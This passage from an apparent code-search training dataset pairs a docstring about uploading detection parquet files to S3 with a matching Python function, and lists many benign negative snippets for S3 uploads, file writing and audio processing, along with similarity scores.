"def writeLowPlayers(self, filename):\n\n assert filename.endswith('.txt')\n file = open(filename, 'w')\n \n samples = []\n for player in self.players:\n if player.lowFps:\n for session in player.sessions:\n for sample in session.samples:\n sample.write(file)", "def update_filename(instance, filename):\n path = os.path.join(\"documents_analizer\", \"documents\")\n name = \"{}{}\".format(highly_random_name(),\n os.path.splitext(filename)[1])\n return os.path.join(path, name)", "def noisePreset() :\n s.noisePreset()", "def morse_to_audio(words, playsound=None, name_file=\"output\\\\code_to_audio_output.wav\"):\n dot = wave.open(\"kropka.wav\", 'rb')\n dash = wave.open(\"kreska.wav\", 'rb')\n\n rate_dot = dot.getframerate()\n\n rate_dash = dash.getframerate()\n\n data_dot = dot.readframes(-1)\n data_dash = dash.readframes(-1)\n data_dot = np.fromstring(data_dot, 'Int16')\n data_dash = np.fromstring(data_dash, 'Int16')\n\n l2=len(data_dot)\n l1=len(data_dash)\n\n output=[]\n\n for element in words:\n # print(element)\n for i in range(0, len(element)):\n # print(element[i])\n if element[i] == '1':\n # playsound(\"kropka.wav\")\n output.extend(data_dot)\n\n if element[i] == '0':\n # playsound(\"kreska.wav\")\n output.extend(data_dash)\n if element[i] == ' ':\n 
output.extend(np.zeros(int(len(data_dash)))*3)\n if i != len(element) - 1:\n # time.sleep(dl_kropka)\n output.extend(np.zeros(int(len(data_dot))))\n else:\n continue\n # time.sleep(dl_kreska)\n output.extend(np.zeros(int(len(data_dash))))\n\n # print(output)\n\n wynik=np.asarray(output)\n\n wynik=np.array(wynik).astype('int16')\n\n wav.write(name_file, rate_dash, wynik)\n\n #plik sie nie odtwarza w windowsie ale w audacity jest już wyraźnym szumem XD\n\n dot.close()\n dash.close()", "def seed_audio_file(dataset_id, data):\n\n for item in data:\n try:\n audiofile = AudioFile()\n audiofile.id_dataset = dataset_id\n audiofile.audio_path = item['file']\n audiofile.date_created = datetime.datetime.now()\n session.add(audiofile)\n session.commit()\n print(f'AudioFile: {audiofile.id} inserted')\n\n # get the data relative to the currenr audiofile\n items = [d for d in data if d['file'] == item['file']][0]\n\n # seed the peak table\n Seed.seed_peak(audiofile.id, items)\n\n # seed the rms table\n Seed.seed_rms(audiofile.id, items)\n\n except Exception as e:\n print(f'seed_audio_file: {e}')", "def make_audio(audio_path):\n content, sample_rate = librosa.load(audio_path, sr=16000)\n del sample_rate\n if content.dtype in (np.float32, np.float64):\n content = (content * np.iinfo(np.int16).max).astype(np.int16)\n return speech.RecognitionAudio(content=content.tobytes())", "def randomKeyFile(file_name):\n\twith open(file_name, \"w\") as kfile:\n\t\tkey = stringGen(256)\n\t\tkfile.write(key)\n\t\tkfile.close()" ]
[ "0.62971425", "0.6159043", "0.5984587", "0.59020734", "0.58086365", "0.5675305", "0.56475496", "0.5606833", "0.559785", "0.5565294", "0.54593736", "0.54581594", "0.5443855", "0.5441127", "0.54234785", "0.542045", "0.5408668", "0.53995633", "0.53893155", "0.5381253", "0.53792244", "0.53454196", "0.5334369", "0.53066516", "0.53053373", "0.52917856", "0.5278346", "0.5245606", "0.5235608", "0.5198715", "0.5172523", "0.5170907", "0.5165481", "0.515927", "0.51511306", "0.5143382", "0.51413226", "0.510828", "0.5080513", "0.507907", "0.50777304", "0.50756156", "0.507364", "0.5051668", "0.50516033", "0.50502545", "0.5050172", "0.5048073", "0.5044134", "0.50274694", "0.50087416", "0.5001905", "0.49991664", "0.49887535", "0.49851227", "0.4984924", "0.4981303", "0.49488008", "0.49478433", "0.49466366", "0.4941256", "0.49359694", "0.49318287", "0.49310616", "0.49252722", "0.49120787", "0.491068", "0.4909609", "0.4908085", "0.49076807", "0.49076396", "0.4907196", "0.49068382", "0.49059916", "0.48888698", "0.48825243", "0.48803186", "0.4870158", "0.48668113", "0.4865984", "0.48625466", "0.48601547", "0.48594904", "0.48438197", "0.48430237", "0.48416346", "0.48415843", "0.48279777", "0.4825472", "0.48231688", "0.48231626", "0.4821127", "0.4819153", "0.4816528", "0.48093918", "0.48011687", "0.4785375", "0.4783096", "0.47826692", "0.47813097" ]
0.689111
0
Upload a file to S3 or move to another directory. INPUT_DIR is the name of the directory with parquets. DETECTIONS_DIR can be a
def upload_file(
    input_dir, output_dir, partition, node_id, job_id, pattern, file_format
):
    logging.basicConfig(
        level=logging.INFO,
        format="%(asctime)s %(levelname)s %(name)s.%(funcName)s: %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
    )
    logging.info(f"Job: {job_id} | Node: {node_id} | Partition {partition}")

    filename = f"{pattern}_{partition}.{file_format}"
    file_path = os.path.join(input_dir, filename)
    output_path = os.path.join(output_dir, filename)

    logging.info(f"Opening detection file: {file_path}")
    data = iodf.read_file(file_path)

    logging.info(f"Writing output in {output_path}")
    iodf.write_file(data, output_path, file_format=file_format)

    logging.info(f"Finish him!")
    return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def upload_data(dir, input_dir, s3_dir):\n config = _read_config(dir)\n sage_maker_client = sagemaker.SageMakerClient(config.aws_profile, config.aws_region)\n\n return sage_maker_client.upload_data(input_dir, s3_dir)", "def upload_file_to_s3(bucket_name, input_filepath, output_filename):\n s3 = boto3.client(\"s3\")\n with open(input_filepath, \"rb\") as f:\n s3.upload_fileobj(f, bucket_name, output_filename)", "def upload_to_s3(bucket_name, sourceDir):\n try:\n client = boto3.client('s3')\n resource = boto3.resource('s3')\n except ClientError as err:\n print(\"Failed to create boto3 client.\\n\" + str(err))\n return False\n try:\n # clean the bucket\n bucket = resource.Bucket(bucket_name)\n for key in bucket.objects.all():\n key.delete()\n\n # upload the new files\n uploadFileNames = getFiles(sourceDir)\n print(\"Found \" + len(uploadFileNames).__str__() + ' files')\n\n for filename in uploadFileNames:\n destName = os.path.join(*(filename.split('/')[1:]))\n print(\"Uploading file \" + filename + ' to ' + destName)\n resource.Object(bucket_name, destName).put(Body=open(filename, 'rb'),\n ContentType=get_contenttype_from_filename(filename))\n\n except ClientError as err:\n print(\"Failed to upload artefact to S3.\\n\" + str(err))\n return False\n except IOError as err:\n print(\"Failed to access artefact in this directory.\\n\" + str(err))\n return False\n\n return True", "def upload_to_s3(file_from_machine, bucket, file_to_s3):\n s3.upload_file(file_from_machine, bucket, file_to_s3)\n print(file_to_s3, \" : is upoaded to s3\")", "def upload_files_to_S3(sourceDir, bucket_name, destDir, aws_access_key_id=None, aws_secret_access_key=None):\n\n # set up the connection to the AWS Bucket.\n if aws_access_key_id == None or aws_secret_access_key == None:\n client = boto3.client(service_name='s3', aws_access_key_id=None, aws_secret_access_key=None)\n else:\n client = boto3.client(service_name='s3', aws_access_key_id=aws_access_key_id,\n aws_secret_access_key=aws_secret_access_key)\n transfer = boto3.s3.transfer.S3Transfer(client)\n\n # Get a list of all the files that have already been uploaded to S3\n MyS3Objects = [s.key for s in boto3.resource('s3').Bucket(bucket_name).objects.filter(Prefix=destDir)]\n\n\n\n\n uploadFileNames = files_to_upload(sourceDir)\n\n #print(sourceDir)\n #print(uploadFileNames)\n\n\n UploadCounter = 0\n\n for filename in uploadFileNames:\n sourcepath = filename[0]\n destpath = destDir + '/' + filename[1]\n\n # If the file is already on S3, don't upload it again\n if destpath in MyS3Objects:\n print(destpath, \" is already on S3\")\n continue\n\n UploadCounter += 1\n if UploadCounter % 100 == 0: print(\"Files Uploaded:\", UploadCounter)\n\n # print ('Uploading %s to Amazon S3 bucket %s' % (sourcepath, bucket_name))\n\n transfer.upload_file(sourcepath, bucket_name, destpath)\n\n print(\"All the files have been uploaded!\")", "def upload_images_to_s3(directory):\n for f in directory.iterdir():\n if str(f).endswith(('.png', '.jpg', '.jpeg')):\n full_file_path = str(f.parent) + \"/\" + str(f.name)\n file_name = str(f.name)\n s3_client.upload_file(full_file_path, BASE_BUCKET, file_name)\n print(f,\"put\")", "def upload_file(self, file_path, file_name, output_path):", "def _upload_s3(self, filename, bucket, objectKey):\n return s3_client.upload_file(filename, bucket, objectKey)", "def upload_bam(bam_s3_path, local_folder_path):\n\n upload_folder(bam_s3_path, local_folder_path)", "def test_put_file(self):\n self.prepare_uploads()\n backend = BackendS3(**self.config)\n uploads = 
self.upload_path\n src = os.path.join(uploads, 'demo-test.tar.gz')\n id = utils.generate_id('demo-test.tar.gz')\n backend.put(src, id)\n path = '/'.join(backend.id_to_path(id)) + '/demo-test.tar.gz'\n self.assertTrue(backend.exists(path))", "def upload_file(local_path, s3_path):\n with open(local_path, 'rb') as binary_data:\n s3.Bucket(bucket_name).put_object(Key=s3_path, Body=binary_data)", "def project_uploader():\n if not current_app.config['S3_KEY']:\n return ''\n if len(request.files) == 0:\n return 'No files selected'\n img = request.files['file']\n if not img or img.filename == '':\n return 'No filename'\n ext = img.filename.split('.')[-1].lower()\n if ext not in ACCEPTED_TYPES:\n return 'Invalid format (allowed: %s)' % ','.join(ACCEPTED_TYPES)\n # generate a simpler filename\n keepcharacters = ('.', '_')\n safe_filename = img.filename.replace(' ', '_')\n safe_filename = \"\".join(\n c for c in safe_filename\n if c.isalnum() or c in keepcharacters).rstrip()\n if not safe_filename:\n safe_filename = \"\".join(random_password(8), '.', ext)\n # use random subfolder inside user id folder\n filename = '/'.join([\n str(current_user.id),\n random_password(24),\n safe_filename\n ])\n # with tempfile.TemporaryDirectory() as tmpdir:\n # img.save(path.join(tmpdir, filename))\n if 'S3_FOLDER' in current_app.config:\n s3_filepath = '/'.join([current_app.config['S3_FOLDER'], filename])\n else:\n s3_filepath = filename\n # print('Uploading to %s' % s3_filepath)\n if 'S3_ENDPOINT' in current_app.config:\n s3_obj = boto3.client(\n service_name='s3',\n endpoint_url=current_app.config['S3_ENDPOINT'],\n aws_access_key_id=current_app.config['S3_KEY'],\n aws_secret_access_key=current_app.config['S3_SECRET'],\n )\n #print('Uploading to endpoint %s' % current_app.config['S3_ENDPOINT'])\n else:\n s3_obj = boto3.client(\n service_name='s3',\n region_name=current_app.config['S3_REGION'],\n aws_access_key_id=current_app.config['S3_KEY'],\n aws_secret_access_key=current_app.config['S3_SECRET'],\n )\n #print('Uploading to region %s' % current_app.config['S3_REGION'])\n # Commence upload\n s3_obj.upload_fileobj(img,\n current_app.config['S3_BUCKET'],\n s3_filepath,\n ExtraArgs={'ContentType': img.content_type,\n 'ACL': 'public-read'}\n )\n return escape('/'.join([current_app.config['S3_HTTPS'], s3_filepath]))", "def upload_file(file_name, s3_key):\n # Upload the file\n s3_connection = boto.connect_s3(aws_access_key_id, aws_secret_access_key)\n bucket = s3_connection.get_bucket(predator_bucket_name)\n try:\n key = boto.s3.key.Key(bucket, s3_key)\n key.set_contents_from_filename(file_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def store_to_s3():\n\n try:\n # establish aws/s3 connection\n s3 = boto3.client('s3',\n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY\n )\n logger.info(\"S3 connection established!\")\n except Exception as e:\n logger.error('Fail to connect to aws s3. 
Please check your credentials!')\n logger.error(e)\n else:\n try:\n # upload local file to S3 bucket\n logger.info(\"Uploading {} to {} bucket as {}\".format(config.Local_File_To_Upload,\n config.Bucket_Name,\n config.S3_Filename))\n s3.upload_file(config.Local_File_To_Upload,\n config.Bucket_Name,\n config.S3_Filename)\n logger.info('File successfully uploaded to S3 bucket!')\n except FileNotFoundError:\n logger.error('File not found, pleas check the file path.')\n except Exception as e:\n logger.error(e)", "def upload_file(s3_client, file_name, object_name=None):\n\n # read bucket name from cfg file\n bucket = config.get('S3', 'LANDING_ZONE')\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name.split('\\\\')[-1]\n\n # Upload the file\n try:\n response = s3_client.upload_file(file_name, bucket, object_name, Callback=ProgressPercentage(file_name))\n# logger.debug(f\"Got response from s3 client for uploading file: {response}\")\n except Exception as e:\n logger.error(f\"Error occurred while upload {file_name} : {e}\")\n return False\n return True", "def upload(file_path, aws_path, access_key, secret_key) -> None:\n # bucket = \"dev-com-courtlistener-storage\"\n bucket = \"seals.free.law\"\n client = boto3.client(\n \"s3\",\n aws_access_key_id=access_key,\n aws_secret_access_key=secret_key,\n )\n transfer = S3Transfer(client)\n if \".png\" in file_path:\n content_type = \"image/png\"\n else:\n content_type = \"image/svg+xml\"\n transfer.upload_file(\n file_path,\n bucket,\n aws_path,\n extra_args={\"ContentType\": content_type, \"ACL\": \"public-read\"},\n )\n print(f\"http://{bucket}.s3-us-west-2.amazonaws.com/{aws_path}\")", "def upload_to_s3():\n\n # get the json password file\n pwd_file = open(PWD_FILE, mode='rb')\n pwd_list = json.load(pwd_file) # calls read() on file object\n\n # only upload if json password file not empty\n if len(pwd_list) > 0:\n # reset file object to beginning\n pwd_file.seek(0)\n\n # setup s3 connection\n s3 = boto3.resource('s3', region_name=Config.connection['region_name'],\n aws_access_key_id=Config.connection['aws_access_key'],\n aws_secret_access_key=Config.connection['aws_secret_key'])\n\n s3_object_path = Config.s3['key_prefix'] + PWD_FILE\n s3.Bucket(Config.s3['bucket_name']).put_object(Key=s3_object_path, Body=pwd_file)", "def upload(filename, bucket):\n print(\"Uploading {} to S3\".format(filename.lower().replace('_', '-')))\n url = \"https://s3.ca-central-1.amazonaws.com/{}/{}\".format(bucket,\n filename.lower().replace('_', '-'))\n with open('{}/{}'.format(WORK_DIR, filename), 'rb') as data:\n requests.put(url, data=data)", "def test_put_file_variant(self):\n self.prepare_uploads()\n backend = BackendS3(**self.config)\n uploads = self.upload_path\n src = os.path.join(uploads, 'demo-test.tar.gz')\n id = utils.generate_id('demo-test.tar.gz')\n backend.put_variant(src, id, 'variant.tar.gz')\n path = '/'.join(backend.id_to_path(id)) + '/variant.tar.gz'\n self.assertTrue(backend.exists(path))", "def upload_file_to_s3(local_path: Path, s3_path: Path, overwrite: bool = False) -> None:\n import warnings\n\n warnings.filterwarnings(\n action=\"ignore\", message=\"unclosed\", category=ResourceWarning\n )\n\n s3_args, unknown = get_s3_args().parse_known_args()\n s3_client = get_s3_client(s3_args)\n log = get_logger(\"upload_file_to_s3\")\n\n try:\n # only write files to s3 that don't already exist unless overwrite is passed\n if s3_object_exists(s3_path) and not overwrite:\n log.debug(\n 
f\"s3://{s3_args.s3_bucket}/{s3_path} already exists in s3, not overwriting\"\n )\n return\n\n s3_client.put_object(\n Body=local_path.read_bytes(), Bucket=s3_args.s3_bucket, Key=str(s3_path)\n )\n log.debug(f\"uploaded s3://{s3_args.s3_bucket}/{s3_path}\")\n\n except s3_client.exceptions.ClientError as exc:\n # catch and raise any errors generated while attempting to communicate with s3\n s3_client_attributes = {\n attr: getattr(s3_client, attr) for attr in s3_client.__dict__.keys()\n }\n s3_client_attributes.update(\n {\"bucket\": s3_args.s3_bucket, \"object_path\": s3_path,}\n )\n raise S3Error(f\"{s3_client_attributes} S3 ClientError\") from exc", "def s3_sync(s3_bucket, s3_prefix, sync_path=\".\"):\n # Get bucket\n s3_resource = boto3.resource(\"s3\")\n bucket = s3_resource.Bucket(s3_bucket)\n\n # Walk paths and subdirectories, uploading files\n for path, subdirs, files in os.walk(sync_path):\n # Get relative path prefix\n relpath = os.path.relpath(path, sync_path)\n if not relpath.startswith('.'):\n prefix = os.path.join(s3_prefix, relpath)\n else:\n prefix = s3_prefix\n\n for file in files:\n file_key = os.path.join(prefix, file)\n bucket.upload_file(os.path.join(path, file), file_key)", "def upload_files(self, source_file_name, destination_blob_name):\n blob = self.bucket.blob(destination_blob_name)\n blob.upload_from_filename(source_file_name)\n\n print(\n \"File {} uploaded to {} in {} bucket.\".format(\n source_file_name, destination_blob_name, self.bucket\n )\n )", "def upload_file_to_bucket(s3_client, file_obj, bucket, folder, object_name=None):\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_obj\n\n # Upload the file\n try:\n response = s3_client.upload_fileobj(file_obj, bucket, f\"{folder}/{object_name}\")\n print(response)\n except ClientError:\n return False\n return True", "def put_upload(self):\n # print \"starting upload...\", self.current_upload['filepath']\n self.touch()\n self.log(\"STARTING_UPLOAD\", level=INFO)\n try:\n Backend.put_file(self.fileobj, self.current_upload[\"gcs_url\"])\n except exceptions.FilePutError as err:\n self.handle_put_error(err, self.fileobj)\n raise", "def upload_json_to_s3(directory):\n for f in directory.iterdir():\n if str(f).endswith('.json'):\n full_file_path = str(f.parent) + \"/\" + str(f.name)\n file_name = str(f.name)\n s3_client.upload_file(full_file_path, BASE_BUCKET, file_name)", "def upload(iid, file_obj, content_type):\n if AWS_CLIENT_CONFIG and BUCKET_NAME:\n try:\n s3 = boto3.resource('s3', **AWS_CLIENT_CONFIG)\n s3.Bucket(BUCKET_NAME).put_object(Key=iid,\n Body=file_obj,\n ContentType=content_type)\n return StorageType.S3\n except botocore.exceptions.ClientError as e:\n logger.error(e)\n else:\n # store locally in temp dir (tests, local development)\n store_temp_file(iid, file_obj)\n return StorageType.TMP\n return None", "def upload_chain(s3_path, local_path, bucket_name='lwr-inverse-us-east'):\n s3 = boto3.resource(\"s3\")\n lwr_AIES = s3.Bucket(bucket_name)\n file_content = open(local_path, 'rb')\n lwr_AIES.put_object(Key=s3_path, Body=file_content)", "def upload_to_aws(local_file, bucket, s3_file, access_key, secret_key):\n s3 = boto3.client('s3', aws_access_key_id=access_key,\n aws_secret_access_key=secret_key)\n \n try:\n s3.upload_file(local_file, bucket, s3_file)\n print(f'Upload of {local_file} to {bucket} as {s3_file} successful.')\n return True\n except FileNotFoundError:\n print(f'File {local_file} not found.')\n return False\n except NoCredentialsError:\n 
print('Credentials invalid or not available.')\n return False", "def upload_object(self, file_path, s3_path):\n logging.info(\"Uploading file to \\\"{}\\\" to S3\".format(s3_path))\n bucket_name, key = S3Util.get_bucket_and_key(s3_path)\n self.s3_resource.Bucket(bucket_name).upload_file(file_path, key)", "def upload_to_s3(site, bucket, directory=None, files=None, prefix=None):\n if bucket is None:\n print red('Error: Bucket must be specified.')\n return\n if directory is None and files is None:\n print red('Error: Directory and/or files must be specified.')\n return\n # Setup boto\n import boto\n from boto.s3.bucket import Bucket\n from boto.s3.key import Key\n import mimetypes\n import fnmatch\n\n setup_aws_access_key(site)\n\n # Connect to S3\n c = boto.connect_s3()\n b = Bucket(c, bucket)\n\n # Fix the prefix\n # prefix itself shouldn't have a / prefix itself but should end with /\n if prefix:\n prefix = prefix.lstrip('/')\n if prefix and not prefix.endswith('/'):\n prefix = prefix + '/'\n\n def __upload(key, filename):\n k = Key(b)\n k.key = key\n headers = {}\n content_type = mimetypes.guess_type(filename)[0]\n if site.has_key('webapp') and site['webapp'].get('cache_control'):\n for pattern in site['webapp']['cache_control']:\n if fnmatch.fnmatch(filename, pattern):\n headers['Cache-Control'] = site['webapp']['cache_control'][pattern]\n break\n if site.has_key('webapp') and site['webapp'].get('gzip_types') and content_type in site['webapp']['gzip_types']:\n from gzip import GzipFile\n from StringIO import StringIO\n # Need to specify content_type when uploading from a string!\n headers['Content-Type'] = content_type\n headers['Content-Encoding'] = 'gzip'\n s = StringIO()\n g = GzipFile(fileobj=s, mode='wb')\n with open(filename, 'rb') as f:\n g.write(f.read())\n g.close()\n k.set_contents_from_string(s.getvalue(), headers)\n else:\n k.set_contents_from_filename(filename, headers)\n\n if files:\n # Upload individual files\n if directory:\n keys = [filename.lstrip('/') for filename in files]\n files = [os.path.join(directory, filename) for filename in files]\n else:\n keys = [os.path.split(filename)[1] for filename in files]\n for i, filename in enumerate(files):\n print 'Uploading %s' % keys[i]\n if prefix:\n key = prefix + keys[i]\n else:\n key = keys[i]\n __upload(key, filename)\n elif directory:\n # Upload an entire directory\n def __upload_dir(arg, dirname, names):\n # arg is the starting directory\n for name in names:\n filename = os.path.join(dirname, name)\n if not os.path.isdir(filename) and not os.path.islink(filename) and not name.startswith('.'):\n key = filename[len(arg):]\n if key.startswith('/'):\n key = key[1:]\n if prefix:\n key = prefix + key\n print 'Uploading %s' % key\n __upload(key, filename)\n os.path.walk(directory, __upload_dir, directory)", "def UploadSource(source_dir, target_object):\n dockerignore = os.path.join(source_dir, '.dockerignore')\n exclude = None\n if os.path.exists(dockerignore):\n with open(dockerignore) as f:\n # Read the exclusions, filtering out blank lines.\n exclude = set(filter(bool, f.read().splitlines()))\n # Remove paths that shouldn't be excluded on the client.\n exclude -= set(BLACKLISTED_DOCKERIGNORE_PATHS)\n with tempfile.NamedTemporaryFile() as f:\n # We are able to leverage the source archiving code from docker-py;\n # however, there are two wrinkles:\n # 1) The 3P code doesn't support gzip (it's expecting a local unix socket).\n # So we create a GzipFile object and let the 3P code write into that.\n # 2) The .seek(0) call at the 
end of the 3P code causes GzipFile to throw an\n # exception. So we use GzipFileIgnoreSeek as a workaround.\n with _GzipFileIgnoreSeek(mode='wb', fileobj=f) as gz:\n docker.utils.tar(source_dir, exclude, fileobj=gz)\n f.seek(0)\n cloud_storage.Copy(f.name, target_object)", "def upload_to_s3(file_path, config):\n logging.info(\"Uploading file to S3 bucket: %s\", config['s3_bucket_name'])\n s3 = boto3.resource('s3')\n s3_filename = config['s3_bucket_path'] + config['rendered_filename']\n s3.Bucket(config['s3_bucket_name']).upload_file(\n file_path, s3_filename, ExtraArgs={\n 'ContentType': 'text/html', 'ACL': 'public-read'})", "def upload_file(file, bucket_path, bucket=S3_BUCKET):\n # Bucket path should be somedir/name_of_file.ext\n try:\n if isinstance(file, str):\n resource.upload_file(file, bucket, bucket_path)\n else:\n resource.upload_fileobj(file, bucket, bucket_path)\n except:\n raise ChildProcessError('Something broke, Cap\\'n')", "def upload_folder_to_s3(folder_path, s3_uri, connection=None):\n\n if connection:\n run_out = connection.run(f\"aws s3 cp --recursive {folder_path}/ {s3_uri}/\")\n else:\n run_out = run(f\"aws s3 cp --recursive {folder_path}/ {s3_uri}/\")\n\n return run_out.return_code", "def _upload_to_s3(s3_uploader, relative_path, file_path, filename):\n try:\n key = os.path.join(s3_uploader[\"key_prefix\"], relative_path, filename)\n s3_uploader[\"transfer\"].upload_file(file_path, s3_uploader[\"bucket\"], key)\n except FileNotFoundError: # noqa ignore=F821\n # Broken link or deleted\n pass\n except Exception: # pylint: disable=broad-except\n logger.exception(\"Failed to upload file to s3.\")\n finally:\n # delete the original file\n if os.path.exists(file_path):\n os.remove(file_path)", "def transfer_files_to_s3(self, input_path, bucket_name, file_ext):\n client = boto3.client('s3', aws_access_key_id=self.access_key,\n aws_secret_access_key=self.secret_key)\n transfer = S3Transfer(client)\n for subdir, dirs, files in os.walk(input_path):\n for file in files:\n file_name, file_extension = os.path.splitext(file)\n full_path = os.path.join(subdir, file)\n if file_extension == '.' 
+ file_ext:\n logging.info(\"transferring file {}\".format(file_name))\n transfer.upload_file(full_path, bucket_name, file_ext\n + '/' + file)", "def _upload_file(file_name, bucket, object_name):\n\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = file_name\n\n # Upload the file\n try:\n s3.upload_file(file_name, bucket, object_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def upload(self, path, key, extra_args={}):\n if key.endswith(\"/\"):\n key += os.path.basename(path)\n if key.startswith(\"/\"):\n key = key[1:]\n remote_path = self.base.full_cell + \"/\" + key\n self.s3.meta.client.upload_file(path, self.bucket, remote_path, ExtraArgs=extra_args)\n print \"UPLOADED {} to s3://{}/{}\".format(path, self.bucket, remote_path)", "def upload_file_s3(file_name, bucket):\n\n # If S3 object_name was not specified, use file_name \n try:\n response = s3_client.upload_file(file_name,\n bucket, \n file_name.replace('../',''))\n print(\"Uploaded \" + file_name)\n except ClientError as e:\n print(\"Failed to upload \" + file_name)\n logging.error(e)\n return False\n return True", "def upload(jsonfiles):\n # clear S3 Bucket\n bucket = S3Bucket()\n bucket.clear()\n for jsonfile in jsonfiles:\n filename = os.path.basename(jsonfile)\n key = build_key(filename)\n logging.info(\"%s %s\", filename, key)\n # store json in S3 object\n bucket.store(key, jsonfile)", "def upload_file_to_s3(file, user_id, type_data, name):\n b = boto_init_s3(\"yapster\")\n path_bucket = \"\"\n if b:\n if type_data == \"cover\":\n path_bucket = \"yapsterusers/uid/\" + user_id + \"/cover/cover\"\n\n if type_data == \"profile\":\n path_bucket = \"yapsterusers/uid/\" + user_id + \"/profile/profile\"\n\n if type_data == \"yap_audio\":\n path_bucket = \"yapsterusers/uid/\" + user_id + \"/yaps/1/audio/\" + name\n\n if type_data == \"yap_image\":\n path_bucket = \"yapsterusers/uid/\" + user_id + \"/yaps/1/image/\" + name\n\n if type_data == \"original\":\n path_bucket = \"yapsterusers/uid/\" + user_id + \"/yaps/1/audio/original\"\n\n k = b.get_key(path_bucket)\n if not k:\n try:\n k = b.new_key(path_bucket)\n except:\n return \"error occured\"\n k.set_contents_from_file(file)\n\n return path_bucket", "def upload_file(bucket, local_file_path, remote_destination_path):\n bucket = get_bucket(bucket)\n k = Key(bucket)\n k.key = remote_destination_path\n k.set_contents_from_filename(local_file_path)", "def test_upload_directory_to_s3_bucket(self):\n conn = boto3.resource('s3', region_name='us-east-1')\n # We need to create the bucket since this is all in Moto's 'virtual' AWS account\n conn.create_bucket(Bucket='foobucket')\n\n s3_connector = S3Connector()\n s3_connector.connect(\"default\")\n s3_connector.upload_directory(directory_path=\"test/test_resources/test_directory\",\n bucket_name=\"foobucket\", aws_directory=\"test_directory\")\n\n # get bucket contents\n response = boto3.client('s3').list_objects(Bucket=\"foobucket\")\n contents = []\n for content in response.get('Contents', []):\n contents.append(content.get('Key'))\n\n self.assertEqual(\n contents, [\"test_directory/test_file\", \"test_directory/test_file2\"])", "def upload_object(self, file_path, destination, use_original_name=True, ExtraArgs=None):\n assert os.path.exists(file_path), \"File path does not exist {}\".format(file_path)\n bucket_name, save_path = self.split_name(destination)\n if use_original_name:\n save_path = os.path.join(save_path, os.path.basename(file_path))\n\n 
self.s3_client.upload_file(file_path, bucket_name, save_path, ExtraArgs=ExtraArgs)\n return os.path.join(bucket_name, save_path)", "def upload_to_s3(s3_path, local_path):\n # Connect to s3 using aws access key\n try:\n s3 = boto3.client('s3',\n aws_access_key_id=os.environ.get(\"AWS_ACCESS_KEY_ID\"),\n aws_secret_access_key=os.environ.get(\"AWS_SECRET_ACCESS_KEY\"))\n logger.info(\"AWS S3 Connected.\")\n except botocore.exceptions.PartialCredentialsError:\n logger.error(\"AWS Credentials Invalid.\")\n\n # Upload all raw pictures under the local path to s3\n bucket_name, s3_store_path = _parse_s3(s3_path)\n if len(list(os.walk(local_path))) > 0:\n for root, dirs, files in os.walk(local_path):\n for file in files:\n s3.upload_file(os.path.join(root, file), bucket_name, os.path.join(s3_store_path, file))\n logger.info(\"{} Uploaded.\".format(file)) # log progress\n\n # If a single file path submitted, upload the single file\n else:\n filename = local_path.split('/')[-1]\n s3.upload_file(local_path, bucket_name, os.path.join(s3_store_path, filename))\n logger.info(\"{} Uploaded.\".format(filename)) # log progress\n\n logger.info(\"All Image Uploaded to S3.\")", "def transfer(self):\n\n # Upload unverified matches to s3 bucket if unverified argument used (production only)\n if self.in_args.unverified:\n files = glob.glob(os.path.join(self.directories['unverified_matches_dir'].format(self.region_dir, self.proc_type), '*'))\n\n # Loop through files found in unverified_matches folder\n for filepath in files:\n filename = os.path.basename(filepath)\n # Upload each file to S3 bucket folder\n self.upload_file(filepath, self.bucket, 'UK_suppliers/Unverified_Matches/' + filename)\n self.unverified_file = filename\n\n # Zip file creation - note will only work for latest unverified file. 
Above loop is added just incase\n # any residual files get added manually to S3 bucket.\n\n # Get filepaths of stats file, filtered and excluded matches files\n stats_fp = self.directories['stats_file'].format(self.region_dir, self.proc_type)\n filtered_matches_fp = self.directories['filtered_matches'].format(self.region_dir, self.proc_type) + '_' + \\\n str(self.best_config) + '.csv'\n\n excluded_matches_fp = self.directories['excluded_matches'].format(self.region_dir, self.proc_type) + '_' + \\\n str(self.best_config) + '.csv'\n\n blacklisted_strings_fp = self.directories['blacklisted_string_matches'].format(self.region_dir)\n\n stats_file_fp = self.directories['script_performance_stats_file'].format(self.region_dir, self.proc_type)\n\n # Assign zip file which will contain above files\n files_zip = self.unverified_file[:10] + \"_files.zip\"\n\n with ZipFile(files_zip, 'w') as myzip:\n myzip.write(stats_fp, os.path.basename(stats_fp))\n myzip.write(filtered_matches_fp,os.path.basename(filtered_matches_fp))\n myzip.write(excluded_matches_fp, os.path.basename(excluded_matches_fp))\n myzip.write(blacklisted_strings_fp, os.path.basename(blacklisted_strings_fp))\n myzip.write(stats_file_fp, os.path.basename(stats_file_fp))\n\n self.upload_file(files_zip, self.bucket, 'UK_suppliers/Archive/' + files_zip)\n\n # Download verified matches from s3 bucket if verified argument (production only)\n if self.in_args.verified:\n self.process_verified_files()\n\n # Add confirmed matches/non-matches to training file\n if self.in_args.convert_training:\n self.runfile_mods.convert_training.ConvertToTraining.convert(self)", "def upload_to_bucket(bucket_name, path_to_source_file, upload_file_name):\r\n\r\n try:\r\n # initialize client & get blob\r\n _, _, blob = create_client(bucket_name, upload_file_name)\r\n\r\n # set the path to source file\r\n blob.upload_from_filename(path_to_source_file)\r\n \r\n except Exception as err:\r\n raise err\r\n sys.exit(1)\r\n \r\n else:\r\n print(f\"upload file '{path_to_source_file}' succeed\")\r\n\r\n return None", "def uploadFilestoS3(self):\n allfilesuploadedcount = 0\n for eachfiledic in self.fileTobeUploaded:\n if eachfiledic[\"uploadedSuccess\"] == 0: #Means this file never got uploaded.\n if os.path.getsize(eachfiledic[\"filepath\"]) < 1000000000: #<1GB\n s3Log.info (\"FileSize < 1GB for :{}, so using single part upload.\".format(eachfiledic[\"filepath\"]) )\n if self.singlePartUpload(eachfiledic) == True:\n eachfiledic[\"uploadedSuccess\"] = 1\n allfilesuploadedcount = allfilesuploadedcount + 1\n else:\n s3Log.info (\"FileSize > 1GB for :{}, so using Multi Part upload. 
